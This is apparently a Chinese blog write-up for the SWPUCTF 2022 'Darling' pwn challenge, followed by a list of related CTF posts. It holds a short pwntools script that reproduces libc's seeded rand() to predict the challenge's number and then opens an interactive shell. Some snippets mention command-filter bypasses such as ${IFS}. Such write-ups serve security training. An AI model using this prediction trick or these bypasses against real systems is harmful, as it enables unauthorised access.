SWPUCTF 2022 Darling wp

于 2022-12-19 15:57:02 发布
阅读量176 收藏
点赞数
分类专栏: ctf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64111146/article/details/128373714
版权
这篇博客展示了如何使用`pwn`库远程连接到服务器,并通过加载`libc.so.6`动态链接库来调用`srand`和`rand`函数生成随机数。在循环中发送不同范围的随机数payload,然后进入交互模式进行进一步的内存操作分析。
摘要由CSDN通过智能技术生成


from pwn import *
from ctypes import *
 
context.log_level = "debug"
 
p = remote('43.142.108.3',28143)
#p = process('./1')
elf = cdll.LoadLibrary('libc.so.6')

elf.srand(0x1317E53)
 
for i in range(1):
    p.recvuntil('you.\n')
    payload = str(elf.rand() % 100 - 64)
    p.sendline(payload)
p.recv()
p.interactive()
 

m0bi1e
关注
专栏目录
SWPUCTF2022 校内道部分 wp
yjprolus的博客
10-26 1464
SWPUCTF2022 wp
2022 SWPUCTF Web+Crypto方向wp
ph0ebus的博客
10-29 6913
简单阅读代码可以发现,__wakeup()方法会首先被激活,覆盖变量的值使flag不能被回显,因此这里需要绕过__wakeup()方法,__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。然后想办法读取文件,cat tac tail都被过滤了,那我们还可以利用nl查看文件内容,这里发现数字被过滤了,我们想到了*来匹配,但是*也被过滤了,尽管如此,我们还可以用?但是里面没有看到类似flag的东西,那就进入根目录看看,但是空格被过滤了,可以用${IFS}绕过。
guess-num的wp
WangLal的博客
03-06 206
攻防世界PWN guess nun的wp 基本三步 checksec,file,执行文件 发现是个64位文件,且只有RELRO没开( 出现Permission denied报错时,用chmod去修改文件权限,就可以了 放进IDA中,在各函数中寻找 在函数sub_C3E中找到了 再进入main函数中怎样获得flag,上网找了一下srand和rand的含义 srand函数是随机数发生器的初始化函数。 srand和rand()配合使用产生伪随机数序列。 所以要通过给srand设置为0或1, 来保证生成的随机数
引用动态库
weixin_30480651的博客
08-02 112
1、引用so库: from ctypes import * >>>CDLL("libc.so.6").printf("12345\n")12345 >>>cdll.LoadLibrary("libc.so.6").printf("12345\n") 12345 2、引用DLL库: 2.1、python2.7.13下的验证 >>>c...
XCTF pwn例题思路整理 侵删
londonyan的博客
11-15 3912
XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1")处理报错 2 read() 栈溢出 函数定义:ssize_t read(int fd, void * buf, size_t count); 函数说明:read()会把参数fd所指的文件传送count 个字节到buf 指针所指的内存中。 返回值:返回值为实际读取到的字节数, 如果返回0, 表示已到达文...
【BUU】n1ctf2018_null
weixin_43960998的博客
04-12 526
struct malloc_state { /* Serialize access. */ __libc_lock_define (, mutex); /* Flags (formerly in max_fast). */ int flags; /* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets su
AnDartest.rar_Anderson-Darling_Anderson–Darling_anderson darling
07-15
在统计学领域,安德森-达灵检验(Anderson-Darling Test),又称Anderson-Darling 检验法,是一种广泛用于评估数据样本是否来自特定理论分布的统计测试。这个测试尤其适用于小样本或非正态分布的情况,它可以检测出...
Anderson-Darling.rar_ADtest_Anderson-Darling_Anderson–Darling_Da
07-14
用于说明ADtest的功能和用处,更好的理解ADtest的作用
darling
03-16
说在前面 虽然此项目是结合使用的但是也可以认为jenkinsfile / ansible的教程使用 项目渊源 农村:田园生活enjoy:荫照椅(早晨和黄昏照射着阳光,午后又遮挡在树荫下的椅子) 达令 寓意着从重复的工作中解脱出来,...
docker-darling:实验性docker容器,带有Darling for macOS运行时
02-04
docker-darling:实验性docker容器,带有Darling for macOS运行时
AnDartest:用于评估样本数据正态性的 Anderson-Darling 检验。-matlab开发
06-01
Anderson-Darling 检验(Anderson 和 Darling,1952 年)用于测试数据样本是否来自特定分布。 它是对 Kolmogorov-Smirnov (KS) 检验的修改,并且比 KS 检验赋予尾部更多的权重。 KS 测试是无分布的,因为临界值不...
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 4124
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3578
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
[SWPUCTF 2021 新生]第一波放题(nssctf刷题)
weixin_63231007的博客
04-09 9081
[SWPUCTF 2021 新生]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json 待解码的 json string 格式的字符串。 asso
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8498
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【图像分割】基于matlab粒子群算法和OSTU和分水岭和K-means脂肪肝水平识别【含Matlab源码 2397期】.md
10-13
【图像分割】基于matlab粒子群算法和OSTU和分水岭和K-means脂肪肝水平识别【含Matlab源码 2397期】.md
HengCe-18900-2024-2030全球与中国先进封装市场现状及未来发展趋势 Sample-样本V2(2).docx
最新发布
10-13
HengCe-18900-2024-2030全球与中国先进封装市场现状及未来发展趋势 Sample-样本V2(2).docx
fastrlock-0.4-cp35-cp35m-win_amd64.whl
10-13
fastrlock-0.4-cp35-cp35m-win_amd64.whl
xxhash-3.0.0-cp39-cp39-win_amd64.whl
10-13
xxhash-3.0.0-cp39-cp39-win_amd64.whl
anderson-darling检验
03-16
Anderson-Darling检验是一种用于检验数据是否来自某个特定分布的统计方法。它基于样本数据与理论分布之间的差异来判断数据是否符合某个分布。该检验通常用于正态分布的检验,但也可以用于其他分布的检验。在进行Anderson-Darling检验时,需要先选择一个理论分布,然后计算出样本数据与该分布之间的差异,最终得到一个统计量。根据该统计量的大小,可以判断数据是否符合该分布。如果统计量较小,则说明数据较符合该分布;反之,如果统计量较大,则说明数据不太符合该分布。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值